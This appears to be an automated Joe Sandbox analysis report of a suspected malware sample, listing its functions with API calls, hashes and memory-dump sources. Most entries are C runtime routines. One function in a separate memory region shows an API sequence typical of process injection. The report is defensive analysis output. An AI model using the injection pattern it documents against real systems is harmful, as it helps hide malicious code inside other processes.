                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                                            • String ID:
                                                                            • API String ID: 3877424927-0
                                                                            • Opcode ID: 25276d1f646da7b76298e578b8e053e7e3b96e54df01e447abe6ae266d0f960a
                                                                            • Instruction ID: 86828a215d97cc2cf495c4e522b915e128cbf3614cc35f840644738a432a0869
                                                                            • Opcode Fuzzy Hash: 25276d1f646da7b76298e578b8e053e7e3b96e54df01e447abe6ae266d0f960a
                                                                            • Instruction Fuzzy Hash: 5B51E8B0A00325ABCF268F6DE88566E77A5AF40320F258729F8359B6D0D778DF548B40
                                                                            Function 0034C396 Relevance: 6.2, APIs: 4, Instructions: 154COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00304517: _fseek.LIBCMT ref: 0030452F
                                                                              • Part of subcall function 0034C56D: _wcscmp.LIBCMT ref: 0034C65D
                                                                              • Part of subcall function 0034C56D: _wcscmp.LIBCMT ref: 0034C670
                                                                            • _free.LIBCMT ref: 0034C4DD
                                                                            • _free.LIBCMT ref: 0034C4E4
                                                                            • _free.LIBCMT ref: 0034C54F
                                                                              • Part of subcall function 00321C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00327A85), ref: 00321CB1
                                                                              • Part of subcall function 00321C9D: GetLastError.KERNEL32(00000000,?,00327A85), ref: 00321CC3
                                                                            • _free.LIBCMT ref: 0034C557
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                            • String ID:
                                                                            • API String ID: 1552873950-0
                                                                            • Opcode ID: 0c4af10440446b1fe8382cae8d32a76f34f7d3e1743b3aef6b58de3d60be7303
                                                                            • Instruction ID: ff639905d7b8f3e11cb53660c873bf520d7190f3ef77125f2adc6dd7deb90797
                                                                            • Opcode Fuzzy Hash: 0c4af10440446b1fe8382cae8d32a76f34f7d3e1743b3aef6b58de3d60be7303
                                                                            • Instruction Fuzzy Hash: 20516FB1D05218AFDF559F65DC81BADBBB9EF48300F10009EF209AB291DB716A80CF58
                                                                            Function 0034C71A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetTempPathW.KERNEL32(00000104,?), ref: 0034C72F
                                                                            • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0034C746
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Temp$FileNamePath
                                                                            • String ID: aut
                                                                            • API String ID: 3285503233-3010740371
                                                                            • Opcode ID: 81a359252be91ae341fbd6c98985ad98a8ced283e19128af12da14d63abaf564
                                                                            • Instruction ID: 55d4bf8a0d6c5c2e96936341c0dff3a428c2d019466265f11447eeb5287ad85e
                                                                            • Opcode Fuzzy Hash: 81a359252be91ae341fbd6c98985ad98a8ced283e19128af12da14d63abaf564
                                                                            • Instruction Fuzzy Hash: E7D05E7150030EBBDB11AB90DC0EFCA776C9700708F0005A0B750A50F1DBB0E6998B54
                                                                            Function 0035F8AE Relevance: 4.9, APIs: 3, Instructions: 385COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5b4c45000b45e812105af0da1c79dd6e862a4565fa06a71becb9af813ce068cc
                                                                            • Instruction ID: d24542dbf52051378b3c6dd9609f573d2a8bb3394ba51215f825cdcf3a068749
                                                                            • Opcode Fuzzy Hash: 5b4c45000b45e812105af0da1c79dd6e862a4565fa06a71becb9af813ce068cc
                                                                            • Instruction Fuzzy Hash: 5CF16A716083019FC715DF24C881B6AB7E5BF88314F10896EF9959B2A2DB70E949CF82
                                                                            Function 00304FFC Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 00305022
                                                                            • Shell_NotifyIconW.SHELL32(00000000,?), ref: 003050CB
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: IconNotifyShell__memset
                                                                            • String ID:
                                                                            • API String ID: 928536360-0
                                                                            • Opcode ID: 421d7b0118ef52bb480f767c05c9c9ec93adb15379d7021260c3c913289c15e4
                                                                            • Instruction ID: 6aba5a91c810207b125b5d944a801fa5747d7656332e1bf41afcb518a445a301
                                                                            • Opcode Fuzzy Hash: 421d7b0118ef52bb480f767c05c9c9ec93adb15379d7021260c3c913289c15e4
                                                                            • Instruction Fuzzy Hash: B4318DB1505701CFD722DF24D855A9BBBE8FF49308F00092EE69AC7281E771A948CF92
                                                                            Function 0032395C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __FF_MSGBANNER.LIBCMT ref: 00323973
                                                                              • Part of subcall function 003281C2: __NMSG_WRITE.LIBCMT ref: 003281E9
                                                                              • Part of subcall function 003281C2: __NMSG_WRITE.LIBCMT ref: 003281F3
                                                                            • __NMSG_WRITE.LIBCMT ref: 0032397A
                                                                              • Part of subcall function 0032821F: GetModuleFileNameW.KERNEL32(00000000,003C0312,00000104,00000000,00000001,00000000), ref: 003282B1
                                                                              • Part of subcall function 0032821F: ___crtMessageBoxW.LIBCMT ref: 0032835F
                                                                              • Part of subcall function 00321145: ___crtCorExitProcess.LIBCMT ref: 0032114B
                                                                              • Part of subcall function 00321145: ExitProcess.KERNEL32 ref: 00321154
                                                                              • Part of subcall function 00327C0E: __getptd_noexit.LIBCMT ref: 00327C0E
                                                                            • RtlAllocateHeap.NTDLL(00D00000,00000000,00000001,00000001,00000000,?,?,0031F507,?,0000000E), ref: 0032399F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                            • String ID:
                                                                            • API String ID: 1372826849-0
                                                                            • Opcode ID: 59d70ab93b86e3c87189b73819d9059b19274c41a3fe0d2f27c0e85dcd013d77
                                                                            • Instruction ID: f021b98c98f60c623151995026b95a2ffec34bb15851886fec00c70e143d60a7
                                                                            • Opcode Fuzzy Hash: 59d70ab93b86e3c87189b73819d9059b19274c41a3fe0d2f27c0e85dcd013d77
                                                                            • Instruction Fuzzy Hash: DF0192312457319AE6273B35FC46B2A235C9B83760F220026F505DF592DBB8ED8086A0
                                                                            Function 0034C6D9 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,0034C385,?,?,?,?,?,00000004), ref: 0034C6F2
                                                                            • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,0034C385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 0034C708
                                                                            • CloseHandle.KERNEL32(00000000,?,0034C385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0034C70F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: File$CloseCreateHandleTime
                                                                            • String ID:
                                                                            • API String ID: 3397143404-0
                                                                            • Opcode ID: 7c07df4dd22fed742d3a75b4e3fb1fc16acef8f5adb19cbc3e67513ac9a43b25
                                                                            • Instruction ID: 757347c7f608d5e7d71ba502264896bcba1ac9367c09f97de69aee627c295c38
                                                                            • Opcode Fuzzy Hash: 7c07df4dd22fed742d3a75b4e3fb1fc16acef8f5adb19cbc3e67513ac9a43b25
                                                                            • Instruction Fuzzy Hash: ACE08632141314BBDB622B54AC0EFCA7F5CAF05770F104150FB54690E097B129118798
                                                                            Function 0034BB64 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _free.LIBCMT ref: 0034BB72
                                                                              • Part of subcall function 00321C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00327A85), ref: 00321CB1
                                                                              • Part of subcall function 00321C9D: GetLastError.KERNEL32(00000000,?,00327A85), ref: 00321CC3
                                                                            • _free.LIBCMT ref: 0034BB83
                                                                            • _free.LIBCMT ref: 0034BB95
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                            • String ID:
                                                                            • API String ID: 776569668-0
                                                                            • Opcode ID: 20f76424029b3f4f106c4d8a086868d24a1af312dab904e69dcb584714f23b8e
                                                                            • Instruction ID: f122f369012615ae2a45cae9568e7d52dac455a57fde76e122af5a7017dbe970
                                                                            • Opcode Fuzzy Hash: 20f76424029b3f4f106c4d8a086868d24a1af312dab904e69dcb584714f23b8e
                                                                            • Instruction Fuzzy Hash: F9E05BB574177147DA3565797F44EB363CC8F14351B15081DB459EF146CF24F84089B4
                                                                            Function 00302322 Relevance: 3.9, APIs: 3, Instructions: 159COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 003022A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,003024F1), ref: 00302303
                                                                            • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 003025A1
                                                                            • CoInitialize.OLE32(00000000), ref: 00302618
                                                                            • CloseHandle.KERNEL32(00000000), ref: 0037503A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Handle$CloseInitializeMessageRegisterWindow
                                                                            • String ID:
                                                                            • API String ID: 3815369404-0
                                                                            • Opcode ID: 4d6471c268e203145a952816c02505c1ec28d192721979cddae7269ce6f60c01
                                                                            • Instruction ID: 14e013c16f9557eb8a117c09e84371249d61abafdfc2f9a829c9559e833070f8
                                                                            • Opcode Fuzzy Hash: 4d6471c268e203145a952816c02505c1ec28d192721979cddae7269ce6f60c01
                                                                            • Instruction Fuzzy Hash: 0471A2B89012818AC307EF5AAD94D95BBACFB5B344F94492ED109CB6B3CB74A410EF54
                                                                            Function 0034BBE8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: __fread_nolock
                                                                            • String ID: EA06
                                                                            • API String ID: 2638373210-3962188686
                                                                            • Opcode ID: 9f5820e384eb2753cb060be0e18c2667a24f6a605ea01a87d320b1de4250e1e2
                                                                            • Instruction ID: c52aee046ef67ebac83540775936c307691315db25d1ba8607ce38ea38af7699
                                                                            • Opcode Fuzzy Hash: 9f5820e384eb2753cb060be0e18c2667a24f6a605ea01a87d320b1de4250e1e2
                                                                            • Instruction Fuzzy Hash: 5A01F5729042287EDB29C7A8C856FEEBBFC9B05301F00415AF592DA181E5B8E7088B60
                                                                            Function 00303A0F Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • IsThemeActive.UXTHEME ref: 00303A73
                                                                              • Part of subcall function 00321405: __lock.LIBCMT ref: 0032140B
                                                                              • Part of subcall function 00303ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00303AF3
                                                                              • Part of subcall function 00303ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00303B08
                                                                              • Part of subcall function 00303D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00303AA3,?), ref: 00303D45
                                                                              • Part of subcall function 00303D19: IsDebuggerPresent.KERNEL32(?,?,?,?,00303AA3,?), ref: 00303D57
                                                                              • Part of subcall function 00303D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,003C1148,003C1130,?,?,?,?,00303AA3,?), ref: 00303DC8
                                                                              • Part of subcall function 00303D19: SetCurrentDirectoryW.KERNEL32(?,?,?,00303AA3,?), ref: 00303E48
                                                                            • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00303AB3
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                                                                            • String ID:
                                                                            • API String ID: 924797094-0
                                                                            • Opcode ID: 402b2d07641006e864e16422c33ff669ffdb2a4a80a903adefff52357c4e1e79
                                                                            • Instruction ID: 735734a2f85cc19dc4b6102a4dc11bdc7bdb3368d2e6a5db6c8cbc21259cb207
                                                                            • Opcode Fuzzy Hash: 402b2d07641006e864e16422c33ff669ffdb2a4a80a903adefff52357c4e1e79
                                                                            • Instruction Fuzzy Hash: F2118E715043519FC302EF2AE84595BBBEDEB99710F00891EF585C72B2DB70A594CB92
                                                                            Function 0032E9D2 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ___lock_fhandle.LIBCMT ref: 0032EA29
                                                                            • __close_nolock.LIBCMT ref: 0032EA42
                                                                              • Part of subcall function 00327BDA: __getptd_noexit.LIBCMT ref: 00327BDA
                                                                              • Part of subcall function 00327C0E: __getptd_noexit.LIBCMT ref: 00327C0E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                                            • String ID:
                                                                            • API String ID: 1046115767-0
                                                                            • Opcode ID: dc0609bb266a468164f6220f3edc4ced4f3bf7eaad2e5360ec347186afa4f38b
                                                                            • Instruction ID: b504492fe2509dbb048a4769e48eafaac48e96153e928cce97850946e0822359
                                                                            • Opcode Fuzzy Hash: dc0609bb266a468164f6220f3edc4ced4f3bf7eaad2e5360ec347186afa4f38b
                                                                            • Instruction Fuzzy Hash: EA118EB2809A709BD713BFA8F94375C7A657F82331F264340E4245F1E2CBB49C4097A5
                                                                            Function 0031F4EA Relevance: 3.0, APIs: 2, Instructions: 43COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0032395C: __FF_MSGBANNER.LIBCMT ref: 00323973
                                                                              • Part of subcall function 0032395C: __NMSG_WRITE.LIBCMT ref: 0032397A
                                                                              • Part of subcall function 0032395C: RtlAllocateHeap.NTDLL(00D00000,00000000,00000001,00000001,00000000,?,?,0031F507,?,0000000E), ref: 0032399F
                                                                            • std::exception::exception.LIBCMT ref: 0031F51E
                                                                            • __CxxThrowException@8.LIBCMT ref: 0031F533
                                                                              • Part of subcall function 00326805: RaiseException.KERNEL32(?,?,0000000E,003B6A30,?,?,?,0031F538,0000000E,003B6A30,?,00000001), ref: 00326856
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                            • String ID:
                                                                            • API String ID: 3902256705-0
                                                                            • Opcode ID: b10efcda4ab2d100672b55645d950eb0b9ca303327653f831cd1929e54a0ffe0
                                                                            • Instruction ID: 09ab89dbe9ac5db8355ed7581f39c6f892e3f9607e07bb68dab9507dfb80182a
                                                                            • Opcode Fuzzy Hash: b10efcda4ab2d100672b55645d950eb0b9ca303327653f831cd1929e54a0ffe0
                                                                            • Instruction Fuzzy Hash: F4F0A43110422D6BDB0BBF9DE8029EE77AC9F05354F704065F90996181DFB0968097A5
                                                                            Function 00323839 Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: __lock_file_memset
                                                                            • String ID:
                                                                            • API String ID: 26237723-0
                                                                            • Opcode ID: 576d5bd85f64b1d726cd9da2f43e912154868d6a9e4619522bc46d4384a05bba
                                                                            • Instruction ID: 2f42103d677a50ed6d903f60a4cc20e163fdfc2e9fcae645771df2c6caef7fcc
                                                                            • Opcode Fuzzy Hash: 576d5bd85f64b1d726cd9da2f43e912154868d6a9e4619522bc46d4384a05bba
                                                                            • Instruction Fuzzy Hash: 0F018471800229ABCF23AFA5BC0259E7B61FF40720F154219F8245F161D7358B65DB91
                                                                            Function 003235E4 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00327C0E: __getptd_noexit.LIBCMT ref: 00327C0E
                                                                            • __lock_file.LIBCMT ref: 00323629
                                                                              • Part of subcall function 00324E1C: __lock.LIBCMT ref: 00324E3F
                                                                            • __fclose_nolock.LIBCMT ref: 00323634
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                            • String ID:
                                                                            • API String ID: 2800547568-0
                                                                            • Opcode ID: 957a0ac0b09c4d7e85dfcbaa089e2102b5b536b50441ad19a10665021cc306cd
                                                                            • Instruction ID: 2998d5e372f910d9d8d0ba0c150436f9b5f551a61b9c469cf96a31a04656c4d0
                                                                            • Opcode Fuzzy Hash: 957a0ac0b09c4d7e85dfcbaa089e2102b5b536b50441ad19a10665021cc306cd
                                                                            • Instruction Fuzzy Hash: 57F0BB71901634AAD7137B75A84376EB6A46F41734F268108E454AF6C1C77C8A019B55
                                                                            Function 00D45B3D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 00D4636D
                                                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00D46391
                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00D463B3
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2346669744.0000000000D44000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D44000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_d44000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                            • String ID:
                                                                            • API String ID: 2438371351-0
                                                                            • Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                                            • Instruction ID: 87fda94e518009f69c0a9e47f273dabacb2188d9c4445fa0e8f873ef9f57ed04
                                                                            • Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                                            • Instruction Fuzzy Hash: B512CE24E18658C7EB24DF64D8507DEB232EF68300F1090E9910DEB7A5E77A4E85CF5A
